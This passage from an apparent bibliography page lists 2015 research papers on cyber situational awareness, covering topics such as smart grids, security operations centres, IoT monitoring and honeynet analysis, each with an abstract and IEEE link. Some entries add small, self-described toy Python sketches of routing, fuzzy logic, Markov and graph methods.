Abstract: Searchable encryption is a promising technique enabling meaningful search operations to be performed on encrypted databases while protecting user privacy from untrusted third-party service providers. However, while most of the existing works focus on common SQL queries, geometric queries on encrypted spatial data have not been well studied. Especially, circular range search is an important type of geometric query on spatial data which has wide applications, such as proximity testing in Location-Based Services and Delaunay triangulation in computational geometry. In this poster, we propose two novel symmetric-key searchable encryption schemes supporting circular range search. Informally, both of our schemes can correctly verify whether a point is inside a circle on encrypted spatial data without revealing data privacy or query privacy to a semi-honest cloud server. We formally define the security of our proposed schemes, prove that they are secure under Selective Chosen-Plaintext Attacks, and evaluate their performance through experiments in a real-world cloud platform (Amazon EC2). To the best of our knowledge, this work represents the first study in secure circular range search on encrypted spatial data.

Keywords: SQL; computational geometry; data privacy; mesh generation; private key cryptography; query processing; Amazon EC2;Delaunay triangulation; SQL query; circular range search; computational geometry; data privacy; encrypted database; encrypted spatial data; geometric query; location-based service; proximity testing; query privacy; selective chosen-plaintext attack; semi-honest cloud server; symmetric-key searchable encryption scheme; user privacy protection; Companies; Data privacy; Encryption; Servers; Spatial databases (ID#: 16-9158)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7164991&isnumber=7164877


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Situational Awareness 2015

 

 
SoS Logo

Situational Awareness 2015

 

Situational awareness is an important human factor for cyber security that impacts resilience, predictive metrics, and composability.  The works cited here were presented in 2015.


Hall, M.J.; Hansen, D.D.; Jones, K., "Cross-domain situational awareness and collaborative working for cyber security," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-8, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166110

Abstract: Enhancing situational awareness is a major goal for organisations spanning many sectors and working across many domains. An increased awareness of the state of environments enables improved decision-making. Endsley's model of situational awareness has improved the understanding for the design of decision-support systems. This paper presents and discusses a theoretical model that extends this to cross-domain working, to influence the design of future collaborative systems. A use-case of this model is discussed within a military context, for cross-domain working between an operational domain and a cyber security domain.

keywords: decision making;decision support systems;groupware;security of data;collaborative working;cross-domain situational awareness;cyber security-domain;decision-support systems;future collaborative systems;improved decision-making;operational-domain;Aerodynamics;Collaboration;Context;Decision making;Feeds;Malware;Collaboration;Cross Domain;Cyber Security;Situational Awareness (ID#: 16-9269)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166110&isnumber=7166109

 

Skopik, F.; Wurzenberger, M.; Settanni, G.; Fiedler, R., "Establishing national cyber situational awareness through incident information clustering," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-8, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166126

Abstract: The number and type of threats to modern information and communication networks have increased massively in recent years. Furthermore, system complexity and interconnectedness have reached a level which makes it impossible to adequately protect networked systems with standard security solutions. There are simply too many unknown vulnerabilities and potential configuration mistakes, and therefore enlarged attack surfaces and channels. A promising approach to better secure today's networked systems is information sharing about threats, vulnerabilities, and indicators of compromise across organizations; and, in case something goes wrong, to report incidents to national cyber security centers. These measures enable early warning systems, support risk management processes, and increase the overall situational awareness of organizations. Several cyber security directives around the world, such as the EU Network and Information Security Directive and the equivalent NIST Framework, specifically demand national cyber security centers and policies for organizations to report incidents. However, effective tools to support the operation of such centers are rare. Typically, existing tools have been developed with the single organization as the customer in mind. These tools are often not appropriate for the large amounts of data involved, or for the application use case at all. In this paper, we therefore introduce a novel incident clustering model and a system architecture, along with a prototype implementation, to establish situational awareness about the security of participating organizations. This is a vital prerequisite for planning further actions towards securing national infrastructure assets.

keywords: business data processing;national security;organisational aspects;pattern clustering;security of data;software architecture;EU Network and Information Security Directive;NIST framework;attack channels;attack surfaces;cyber security directives;early warning systems;incident information clustering;information and communication networks;information sharing;national cyber security centers;national cyber situational awareness;national infrastructure assets;networked systems protection;organizations;risk management processes;standard security solutions;system architecture;system complexity;system interconnectedness;threats;Clustering algorithms;Computer security;Information management;Market research;Organizations;Standards organizations (ID#: 16-9270)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166126&isnumber=7166109

 

Shovgenya, Y.; Skopik, F.; Theuerkauf, K., "On demand for situational awareness for preventing attacks on the smart grid," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-4, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166133

Abstract: Renewable energy sources and widespread small-scale power generators change the structure of the power grid, where actual power consumers also temporarily become suppliers. Smart grids require continuous management of complex operations through utility providers, which leads to increasing interconnections and usage of ICT-enabled industrial control systems. Yet, often insufficiently implemented security mechanisms and the lack of appropriate monitoring solutions will make the smart grid vulnerable to malicious manipulations that may possibly result in severe power outages. Having a thorough understanding about the operational characteristics of smart grids, supported by clearly defined policies and processes, will be essential to establishing situational awareness, and thus, the first step for ensuring security and safety of the power supply.

keywords: electric generators;electricity supply industry;industrial control;power consumption;power generation control;power generation reliability;power system interconnection;power system management;power system security;renewable energy sources;smart power grids;ICT-enabled industrial control system;actual power consumer;implemented security mechanism;power supply safety;power supply security;renewable energy source;situational awareness;small-scale power generator;smart power grid;Europe;Generators;Power generation;Renewable energy sources;Security;Smart grids;Smart meters;industrial control systems;situational awareness;smart generator;smart grid (ID#: 16-9271)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166133&isnumber=7166109

 

Song, R.; Brown, J.D.; Tang, H.; Salmanian, M., "Secure and efficient routing by Leveraging Situational Awareness Messages in tactical edge networks," in Military Communications and Information Systems (ICMCIS), 2015 International Conference on, pp. 1-8, 18-19 May 2015. doi: 10.1109/ICMCIS.2015.7158713

Abstract: A desired capability in military operations is the reliable and efficient sharing of Situational Awareness (SA) data at the tactical edge network. Many implementations of SA sharing in the literature use frequent broadcasts of SA messages in order to provide an up-to-date and comprehensive operating picture to all nodes. However, SA sharing may result in an increase in bandwidth requirements at the tactical edge, where power and bandwidth are scarce. Efficient realtime routing is also a challenge in a tactical edge network. We believe there is a good opportunity to leverage the realtime periodic SA messages for assisting routing services. To the best of our knowledge, little research has been done on this front. In this paper, we propose a secure and efficient routing by leveraging SA messages (SER-SA) in tactical edge mobile ad hoc networks. The SER-SA protocol utilizes realtime broadcast SA messages to not only transmit SA data but also to facilitate Multipoint Relay (MPR) node selection and route discovery for providing both realtime broadcast and unicast communication services. In SER-SA, broadcast forwarding is performed only by MPR nodes, which can reduce bandwidth usage compared to pure flooding methods such as Multicast Ad hoc On-Demand Distance Vector Routing (MAODV). In addition, we reduce bandwidth usage even further by both avoiding dissemination of specific designated routing messages in the network and enhancing the (traditionally local) MPR selection algorithm based on a global algorithm enabled by the shared global SA. We show through simulations that the proposed SER-SA protocol facilitates route discovery in a more bandwidth efficient manner. As a result, it performs better in terms of delivery ratio for providing both broadcast and unicast services in tactical scenarios compared to the existing MANET multicast routing protocols such as Multicast Optimized Link State Routing and MAODV.

keywords: broadcast communication;military communication;mobile ad hoc networks;relay networks (telecommunication);routing protocols;telecommunication security;MPR selection algorithm;SA message leveraging;SER- SA routing protocol;SER-SA;bandwidth usage reduction;broadcast communication service;multipoint relay node selection;route discovery;situational awareness message leveraging;tactical edge mobile ad hoc network security;unicast communication service;Bandwidth;Network topology;Routing;Routing protocols;Topology;Unicast (ID#: 16-9272)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7158713&isnumber=7158667
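
The MPR selection that SER-SA piggybacks on SA messages follows the classic OLSR-style greedy heuristic: cover every two-hop neighbour with as few one-hop relays as possible. A minimal sketch with an invented toy topology (the paper's globally informed enhancement is not reproduced here):

```python
# Greedy Multipoint Relay (MPR) selection: choose the smallest set of
# one-hop neighbours that covers every two-hop neighbour. Classic OLSR-style
# heuristic; the topology below is invented.
one_hop = {"A", "B", "C"}
two_hop_via = {"A": {"D", "E"}, "B": {"E", "F"}, "C": {"F", "G"}}

uncovered = set().union(*two_hop_via.values())
mprs = set()
while uncovered:
    # Pick the neighbour covering the most still-uncovered two-hop nodes.
    best = max(sorted(one_hop - mprs),
               key=lambda n: len(two_hop_via[n] & uncovered))
    mprs.add(best)
    uncovered -= two_hop_via[best]

print(sorted(mprs))  # ['A', 'C'] covers D, E, F, and G
```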

 

Evesti, A.; Frantti, T., "Situational Awareness for security adaptation in Industrial Control Systems," in Ubiquitous and Future Networks (ICUFN), 2015 Seventh International Conference on, pp. 1-6, 7-10 July 2015. doi: 10.1109/ICUFN.2015.7182484

Abstract: Situational Awareness (SA) offers an analysed view of the system's security posture. Securing Industrial Control Systems (ICSs) and critical infrastructures requires timely and correct SA. System administrators make decisions and modify security mechanisms based on SA information. In this paper, we envision how security adaptation can facilitate administrators' work in ICS protection. Security adaptation is not widely applied in the ICS context. Moreover, existing security adaptation approaches concentrate on recognition of an adaptation need, i.e., building situational awareness, instead of security decision making. Therefore, we present steps to create a security adaptation plan, and apply fuzzy set theory and linguistic relations for decision making when SA information indicates that the required security is not reached.

keywords: control engineering computing;critical infrastructures;decision making;industrial control;security of data;ICS protection;SA information;fuzzy set theory;industrial control systems;linguistic relations;security adaptation approach;security adaptation plan;security decision making;security mechanisms;system administrators;system security posture;Adaptation models;Analytical models;Authentication;Decision making;Monitoring;Pragmatics;ICS;critical infrastructure;decision making;self-adaptation;self-protection (ID#: 16-9273)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7182484&isnumber=7182475

 

Gray, C.C.; Ritsos, P.D.; Roberts, J.C., "Contextual network navigation to provide situational awareness for network administrators," in Visualization for Cyber Security (VizSec), 2015 IEEE Symposium on, pp. 1-8, 25-25 Oct. 2015. doi: 10.1109/VIZSEC.2015.7312769

Abstract: One of the goals of network administrators is to identify and block sources of attacks from a network stream. Various tools have been developed to help the administrator identify the IP or subnet to be blocked, however these tend to be non-visual. Having a good perception of the wider network can aid the administrator in identifying their origin, but while network maps of the Internet can be useful for such endeavors, they are difficult to construct, comprehend and even utilize in an attack, and are often referred to as being “hairballs”. We present a visualization technique that displays pathways back to the attacker; we include all potential routing paths with a best-efforts identification of the commercial relationships involved. These two techniques can potentially highlight common pathways and/or networks to allow faster, more complete resolution to the incident, as well as fragile or incomplete routing pathways to/from a network. They can help administrators re-profile their choice of IP transit suppliers to better serve a target audience.

keywords: IP networks;Internet;computer network security;data visualisation;telecommunication network routing;IP;IP transit suppliers;Internet;attack sources;best-efforts identification;commercial relationships;contextual network navigation;hairballs;incomplete routing pathways;network administrators;network maps;network stream;routing paths;situational awareness;subnet;visualization technique;Data visualization;Internet;Navigation;Peer-to-peer computing;Planning;Routing;Visualization (ID#: 16-9274)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7312769&isnumber=7312757

 

Sheng Miao; Hammell, R.J.; Ziying Tang; Hanratty, T.; Dumer, J.; Richardson, J., "Integrating complementary/contradictory information into fuzzy-based VoI determinations," in Computational Intelligence for Security and Defense Applications (CISDA), 2015 IEEE Symposium on, pp. 1-7, 26-28 May 2015. doi: 10.1109/CISDA.2015.7208636

Abstract: In today's military environment vast amounts of disparate information are available. To aid situational awareness it is vital to have some way to judge information importance. Recent research has developed a fuzzy-based system to assign a Value of Information (VoI) determination for individual pieces of information. This paper presents an investigation of the effect of integrating subsequent complementary and/or contradictory information into the VoI process. Specifically, the idea of using complementary and/or contradictory new information to impact the previously used fuzzy membership values for the information content characteristic applied in the VoI calculations is shown to be a particularly suitable approach.

keywords: content-addressable storage;fuzzy set theory;information systems;military computing;VoI process;complementary-contradictory information integration;fuzzy membership values;fuzzy-based VoI determinations;fuzzy-based system;information content characteristics;military environment;situational awareness;value of information determination;Decision support systems;decision support;fuzzy associative memory;intelligence analysis;situational awareness;value of information (ID#: 16-9275)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7208636&isnumber=7208613
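
As a flavour of the fuzzy-membership update the abstract describes, the sketch below uses a triangular membership function for "high information value" and a simple corroboration-driven revision. The update rule is an invented placeholder, not the authors' fuzzy associative memory rules.

```python
# Triangular fuzzy membership plus a toy revision rule: complementary
# reports raise a previously assigned membership value, contradictory
# reports lower it. Invented illustration, not the authors' FAM rules.
def tri_membership(x: float, lo: float, peak: float, hi: float) -> float:
    if x <= lo or x >= hi:
        return 0.0
    return (x - lo) / (peak - lo) if x <= peak else (hi - x) / (hi - peak)

def revise(membership: float, corroboration: float) -> float:
    """corroboration > 0 for complementary reports, < 0 for contradictory."""
    return min(1.0, max(0.0, membership + 0.2 * corroboration))

m = tri_membership(0.7, 0.4, 0.8, 1.0)  # initial 'high value' membership
print(round(m, 2))                       # 0.75
print(round(revise(m, +1.0), 2))         # complementary report raises it
print(round(revise(m, -1.0), 2))         # contradictory report lowers it
```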

 

Onwubiko, C., "Cyber security operations centre: Security monitoring for protecting business and supporting cyber defense strategy," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-10, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166125

Abstract: Cyber security operations centre (CSOC) is an essential business control aimed to protect ICT systems and support an organisation's Cyber Defense Strategy. Its overarching purpose is to ensure that incidents are identified and managed to resolution swiftly, and to maintain safe & secure business operations and services for the organisation. A CSOC framework is proposed comprising Log Collection, Analysis, Incident Response, Reporting, Personnel and Continuous Monitoring. Further, a Cyber Defense Strategy, supported by the CSOC framework, is discussed. Overlaid atop the strategy is the well-known Her Majesty's Government (HMG) Protective Monitoring Controls (PMCs). Finally, the difficulty and benefits of operating a CSOC are explained.

keywords: government data processing;security of data;CSOC framework;HMG protective monitoring controls;Her Majestys Government;ICT systems;business control;business protection;cyber defense strategy support;cyber security operations centre;information and communications technology;security monitoring;Business;Computer crime;Monitoring;System-on-chip;Timing;Analysis;CSOC;CSOC Benefits & Challenges;CSOC Strategy;Correlation;Cyber Incident Response;Cyber Security Operations Centre;Cyber Situational Awareness;CyberSA;Log Source;Risk Management;SOC (ID#: 16-9276)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166125&isnumber=7166109

 

Gendreau, A.A., "Situation Awareness Measurement Enhanced for Efficient Monitoring in the Internet of Things," in Region 10 Symposium (TENSYMP), 2015 IEEE, pp. 82-85, 13-15 May 2015. doi: 10.1109/TENSYMP.2015.13

Abstract: The Internet of Things (IoT) is a heterogeneous network of objects that communicate with each other and their owners over the Internet. In the future, the utilization of distributed technologies in combination with their object applications will result in an unprecedented level of knowledge and awareness, creating new business opportunities and expanding existing ones. However, in this paradigm where almost everything can be monitored and tracked, an awareness of the state of the monitoring systems' situation will be important. Given the anticipated scale of business opportunities resulting from new object monitoring and tracking capabilities, IoT adoption has not been as fast as expected. The reason for the slow growth of application objects is the immaturity of the standards, which can be partly attributed to their unique system requirements and characteristics. In particular, the IoT standards must exhibit efficient self-reliant management and monitoring capability, which in a hierarchical topology is the role of cluster heads. IoT standards must be robust, scalable, adaptable, reliable, and trustworthy. These criteria are predicated upon the limited lifetime, and the autonomous nature, of wireless personal area networks (WPANs), of which wireless sensor networks (WSNs) are a major technological solution and research area in the IoT. In this paper, the energy efficiency of a self-reliant management and monitoring WSN cluster head selection algorithm, previously used for situation awareness, was improved upon by sharing particular established application cluster heads. This enhancement saved energy and reporting time by reducing the path length to the monitoring node. Also, a proposal to enhance the risk assessment component of the model is made. We demonstrate through experiments that when benchmarked against both a power and randomized cluster head deployment, the proposed enhancement to the situation awareness metric used less power. Potentially, this approach can be used to design a more energy efficient cluster-based management and monitoring algorithm for the advancement of security, e.g. Intrusion detection systems (IDSs), and other standards in the IoT.

keywords: Internet of Things;personal area networks;security of data;wireless sensor networks;Internet of Things;WPAN;WSN;distributed technologies;efficient self-reliant management and monitoring capability;heterogeneous network;object monitoring and tracking capabilities;situation awareness measurement;situation awareness metric;wireless personal area networks;wireless sensor networks;Energy efficiency;Internet of things;Monitoring;Security;Standards;Wireless sensor networks;Internet of Things;Intrusion detection system;Situational awareness;Wireless sensor networks (ID#: 16-9277)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166243&isnumber=7166213
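
The energy saving claimed above comes from reusing one established cluster head across co-located applications instead of electing one per application. A deliberately small sketch, with invented energy values and a highest-residual-energy election rule standing in for the paper's algorithm:

```python
# Toy cluster-head sharing: two applications report via one established
# head rather than electing their own, shortening report paths. The energy
# values and election rule are invented placeholders.
nodes = {"n1": 0.9, "n2": 0.7, "n3": 0.4}      # residual energy per node

def elect_cluster_head(candidates: dict) -> str:
    return max(candidates, key=candidates.get)  # most energy remaining wins

shared_head = elect_cluster_head(nodes)
apps = ["monitoring", "intrusion-detection"]
routes = {app: shared_head for app in apps}     # both report via one head

print(routes)  # {'monitoring': 'n1', 'intrusion-detection': 'n1'}
```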

 

Abraham, S.; Nair, S., "A Novel Architecture for Predictive CyberSecurity Using Non-homogenous Markov Models," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 774-781, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.446

Abstract: Evaluating the security of an enterprise is an important step towards securing its system and resources. However, existing research provides limited insight into understanding the impact attacks have on the overall security goals of an enterprise. We still lack effective techniques to accurately measure the predictive security risk of an enterprise, taking into account the dynamic attributes associated with vulnerabilities that can change over time. It is therefore critical to establish an effective cyber-security analytics strategy to minimize risk and protect critical infrastructure from external threats before an attack even starts. In this paper we present an integrated view of security for computer networks within an enterprise: understanding threats and vulnerabilities, and performing analysis to evaluate the current as well as future security situation of an enterprise to address potential situations. We formally define a non-homogeneous Markov model for quantitative security evaluation using Attack Graphs which incorporates time-dependent covariates, namely the vulnerability age and the vulnerability discovery rate, to help visualize the future security state of the network, leading to actionable knowledge and insight. We present experimental results from applying this model on a sample network to demonstrate the practicality of our approach.

keywords: Markov processes;computer network security;attack graphs;computer networks;cyber security analytics strategy;dynamic attributes;enterprise security goals;external threats;impact attacks;nonhomogeneous Markov model;nonhomogenous Markov Models;predictive cybersecurity;predictive security risk;quantitative security evaluation;time dependent covariates;Biological system modeling;Computer architecture;Computer security;Markov processes;Measurement;Attack Graph;CVSS;Cyber Situational Awareness;Markov Model;Security Metrics;Vulnerability Discovery Model;Vulnerability Lifecycle Model (ID#: 16-9278)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345354&isnumber=7345233
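
The core of the model is a Markov chain whose transition probabilities change with time, here through vulnerability age. The sketch below is a minimal numerical illustration: the exploitability curve, state space, and rates are invented placeholders rather than the paper's CVSS-driven parameters.

```python
# Non-homogeneous Markov chain: the chance of leaving the "secure" state
# grows with vulnerability age. Curve and rates are invented placeholders.
import numpy as np

def transition_matrix(t: int) -> np.ndarray:
    p = 0.5 * (1 - np.exp(-0.1 * t))   # exploit likelihood grows with age
    # States: 0 = secure, 1 = exploited, 2 = compromised (absorbing).
    return np.array([[1 - p, p,   0.0],
                     [0.0,   0.4, 0.6],
                     [0.0,   0.0, 1.0]])

state = np.array([1.0, 0.0, 0.0])      # start fully secure
for t in range(1, 13):                 # evolve month by month
    state = state @ transition_matrix(t)

print("P(compromised) after 12 steps:", round(float(state[2]), 3))
```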

 

Angelini, M.; Prigent, N.; Santucci, G., "PERCIVAL: proactive and reactive attack and response assessment for cyber incidents using visual analytics," in Visualization for Cyber Security (VizSec), 2015 IEEE Symposium on, pp. 1-8, 25-25 Oct. 2015. doi: 10.1109/VIZSEC.2015.7312764

Abstract: Situational awareness is a key concept in cyber-defence. Its goal is to make the user aware of different and complex aspects of the network he or she is monitoring. This paper proposes PERCIVAL, a novel visual analytics environment that contributes to situational awareness by allowing the user to understand the network security status and to monitor security events that are happening on the system. The proposed visualization allows for comparing the proactive security analysis with the actual attack progress, providing insights on the effectiveness of the mitigation actions the system has triggered against the attack and giving an overview of the attack's possible evolution. Moreover, the same visualization can be fruitfully used in proactive analysis, since it allows for getting details on computed attack paths and evaluating the mitigation actions that have been proactively computed by the system. A preliminary user study provided positive feedback on the prototype implementation of the system. A video of the system is available at: https://youtu.be/uMpYCJCX95k.

keywords: data analysis;data visualisation;security of data;PERCIVAL;cyber incidents;cyber-defence;network security status;proactive attack;proactive security analysis;reactive attack;response assessment;security event monitoring;situational awareness;visual analytics environment;visualization;Context;Network topology;Prototypes;Security;Topology;Visual analytics;Cyber-security;attack paths;incident response assessment;proactive analysis (ID#: 16-9279)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7312764&isnumber=7312757

 

Puuska, S.; Kansanen, K.; Rummukainen, L.; Vankka, J., "Modelling and real-time analysis of critical infrastructure using discrete event systems on graphs," in Technologies for Homeland Security (HST), 2015 IEEE International Symposium on, pp. 1-5, 14-16 April 2015. doi: 10.1109/THS.2015.7225330

Abstract: Critical infrastructure (CI) systems form an interdependent network where failures in one system may quickly affect the state of other linked systems. Real-time modelling and analysis of CI systems gives valuable time-critical insight into the situational status during incidents and standard operation. Obtaining real-time quantitative measurements about the state of CI systems is necessary for situational awareness (SA) purposes. In this paper we present a general framework for real-time critical infrastructure modelling and analysis using discrete event systems (DES) on graphs. Our model augments standard graph-theoretic analysis with elements from automata theory to achieve a model which captures interdependencies in CI. The framework was tested on various graphs with differing sizes and degree distributions. The resulting framework was implemented, and benchmarks indicate that it is suitable for real-time SA analysis.

keywords: critical infrastructures;discrete event systems;graph theory;modelling;real-time systems;security of data;CI system;DES;SA;automata theory;critical infrastructure;digital security;discrete event system;graph-theoretic analysis;real-time analysis;real-time modelling;situational awareness;Analytical models;Automata;Benchmark testing;Data models;Discrete-event systems;Monitoring;Real-time systems (ID#: 16-9280)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7225330&isnumber=7190491
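
A toy version of the framework's theme, under invented assumptions: failures cascade through an interdependent CI graph and are processed as discrete events in time order, with a one-hop delay and a rule that a node fails when any of its dependencies fails.

```python
# Discrete-event failure propagation over an invented CI dependency graph:
# events are processed in time order; a node fails when any dependency fails.
import heapq

depends_on = {"hospital": ["power", "water"], "water": ["power"], "telecom": ["power"]}
dependents: dict[str, list[str]] = {}
for node, deps in depends_on.items():
    for d in deps:
        dependents.setdefault(d, []).append(node)

DELAY = 1                      # time units for a failure to cascade one hop
events = [(0, "power")]        # initial incident: power fails at t = 0
failed: dict[str, int] = {}

while events:
    t, node = heapq.heappop(events)
    if node in failed:
        continue               # already failed via an earlier event
    failed[node] = t
    for nxt in dependents.get(node, []):
        heapq.heappush(events, (t + DELAY, nxt))

print(failed)  # power fails at t=0; hospital, water, and telecom at t=1
```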

 

Farantatos, E.; Del Rosso, A.; Bhatt, N.; Kai Sun; Yilu Liu; Liang Min; Chaoyang Jing; Jiawei Ning; Parashar, M., "A hybrid framework for online dynamic security assessment combining high performance computing and synchrophasor measurements," in Power & Energy Society General Meeting, 2015 IEEE, pp. 1-5, 26-30 July 2015. doi: 10.1109/PESGM.2015.7286581

Abstract: A hybrid simulation/measurement-based framework for online dynamic security assessment (DSA) is proposed in this work. It combines the strengths and features of simulation-based and measurement-based approaches to develop a tool that integrates the results and provides real-time situational awareness on available operating margins against major stability problems. High performance computing capability is suggested and used in the simulation-based engine, while synchrophasor measurements are used as the input to the measurement-based stability assessment algorithms. The proposed framework is expected to provide solid foundation for new generation of real-time DSA tools that are needed for operators to assess in real-time the system's dynamic performance and operational security risk.

keywords: parallel processing;phasor measurement;power system security;power system simulation;power system stability;high performance computing capability;measurement-based stability assessment algorithms;online dynamic security assessment;operational security risk;real-time DSA tools;real-time situational awareness;simulation-based engine;stability problems;synchrophasor measurements;Analytical models;Computational modeling;Power system stability;Real-time systems;Stability criteria;Voltage measurement;Angular Stability;Dynamic Security Assessment;High-Performance Computing;Synchrophasors;Transient Stability;Visualizations;Voltage Stability (ID#: 16-9281)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7286581&isnumber=7285590

 

Cintuglu, M.H.; de Azevedo, R.; Ma, T.; Mohammed, O.A., "Real-time experimental analysis for protection and control of smart substations," in Innovative Smart Grid Technologies Latin America (ISGT LATAM), 2015 IEEE PES, pp. 485-490, 5-7 Oct. 2015. doi: 10.1109/ISGT-LA.2015.7381203

Abstract: To reach the future smart grid vision, comprehensively equipped test beds are required for identification of the vulnerabilities, security concerns and the impact analysis of the new control and protection concepts. The future smart substations are expected to have enhanced capabilities such as wide-area situational awareness, interoperability, and self-sustained generation capability to achieve resilient power grid goals. Prior to field deployment, any new protection and control capabilities should pass rigorous tests. With this motivation, this paper presents a real-time experimental analysis for protection and control of smart substations in a state-of the-art test bed platform. A coordinated wide-area protection approach is proposed for transmission and distribution levels enabling interoperability between IEDs at different layers. An aggregated distributed generation and storage dispatch optimization method is proposed for self-sustained smart substations in case of outage such as a blackout situation. In order to validate the proposed protection and control methods, experimental results are given.

keywords: distributed power generation;power generation dispatch;power generation protection;power grids;power transmission protection;substation protection;aggregated distributed generation;coordinated wide area protection;distribution levels;real-time experimental analysis;resilient power grid;self-sustained generation;smart substation control;smart substation protection;storage dispatch optimization;transmission levels;wide-area situational awareness;IEC Standards;Interoperability;Optimization;Protocols;Real-time systems;Smart grids;Substations;Intelligent electronic device;interoperability;phasor measurement unit;protection;smart grid;substation;test bed (ID#: 16-9282)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381203&isnumber=7381114

 

Paxton, N.C.; Dae-il Jang; Russell, S.; Gail-Joon Ahn; Moskowitz, I.S.; Hyden, P., "Utilizing Network Science and Honeynets for Software Induced Cyber Incident Analysis," in System Sciences (HICSS), 2015 48th Hawaii International Conference on, pp. 5244-5252, 5-8 Jan. 2015. doi: 10.1109/HICSS.2015.619

Abstract: Increasing situational awareness and investigating the cause of a software-induced cyber attack continues to be one of the most difficult yet important endeavors faced by network security professionals. Traditionally, these forensic pursuits are carried out by manually analyzing the malicious software agents at the heart of the incident, and then observing their interactions in a controlled environment. Both of these steps are time-consuming and difficult to maintain due to the ever-changing nature of malicious software. In this paper we introduce a network-science-based framework which conducts incident analysis on a dataset by constructing and analyzing relational communities. Construction of these communities is based on the connections of topological features formed when actors communicate with each other. We evaluate our framework using a network trace of the BlackEnergy malware network, captured by our honeynet. We have found that our approach is accurate and efficient, and could prove a viable alternative to the current status quo.

keywords: computer network security;invasive software;software agents;BlackEnergy malware network;honeynet;malicious software agents;network science based framework;network security professionals;network trace;situational awareness;software induced cyber incident analysis;software-induced cyber attack;topological features;Command and control systems;Communities;IP networks;Laboratories;Malware;Servers;Software;Community Detection;Honeynets;Network Forensics (ID#: 16-9283)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7070445&isnumber=7069647
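
The community-construction step can be approximated in a few lines: build a graph from observed "who talks to whom" records and extract connected components as candidate communities. The flow records below are invented, and real community detection (and the paper's framework) is considerably richer.

```python
# Connected components of a communication graph as candidate communities.
# Flow records are invented; real community detection is richer than this.
from collections import defaultdict

flows = [("10.0.0.5", "c2.example.net"), ("10.0.0.9", "c2.example.net"),
         ("172.16.1.2", "mirror.example.org")]

graph = defaultdict(set)
for a, b in flows:
    graph[a].add(b)
    graph[b].add(a)

seen, communities = set(), []
for start in list(graph):
    if start in seen:
        continue
    stack, comp = [start], set()
    while stack:                 # depth-first traversal of one component
        n = stack.pop()
        if n in comp:
            continue
        comp.add(n)
        stack.extend(graph[n] - comp)
    seen |= comp
    communities.append(sorted(comp))

print(communities)  # two communities: the C2 cluster and the mirror pair
```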

 

Shan Lu; Kokar, M.M., "A situation assessment framework for cyber security information relevance reasoning," in Information Fusion (Fusion), 2015 18th International Conference on, pp. 1459-1466, 6-9 July 2015.  Doi:  (not provided)

Abstract: Cyber security is one of the most serious economic and national challenges faced by nations all over the world. When a cyber security incident occurs, the critical question that security administrators are concerned about is: What has happened? Cyber situation assessment is critical to making correct and timely defense decisions by the analysts. STIX ontology, which was developed by taking advantage of existing cyber security related standards, is used to represent cyber threat information and infer important features of the cyber situation that help decision makers form their situational awareness. However, due to the widespread application of information technology, security analysts face a challenge in information overload. There are still huge volumes of low level observations captured by various sensors and network tools that need to be used to derive the high level intelligence queries such as potential courses of action and future impact. Therefore, identification of the relevant cyber threat information for a specific query is a crucial procedure for cyber situation assessment. In this paper, we leverage the STIX ontology to represent cyber threat information in a logical framework. In order to recognize specific situation types and identify the minimal and sufficient information for answering a query automatically, we propose an information relevance reasoning mechanism based on situation theory. Finally, we implement our proposed framework using a dataset generated by Skaion corporation.

keywords: inference mechanisms;ontologies (artificial intelligence);security of data;STIX ontology;Skaion corporation;cyber security information relevance reasoning;cyber security related standards;cyber situation assessment framework;cyber threat information;defense decisions;high level intelligence queries;information overload;information technology;security analysts;situation theory;situational awareness;Cognition;Computer security;Computers;Knowledge based systems;Ontologies;Semantics (ID#: 16-9284)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7266729&isnumber=7266535

 

Dawson, S.; Crawford, C.; Dillon, E.; Anderson, M., "Affecting operator trust in intelligent multirobot surveillance systems," in Robotics and Automation (ICRA), 2015 IEEE International Conference on, pp. 3298-3304, 26-30 May 2015. doi: 10.1109/ICRA.2015.7139654

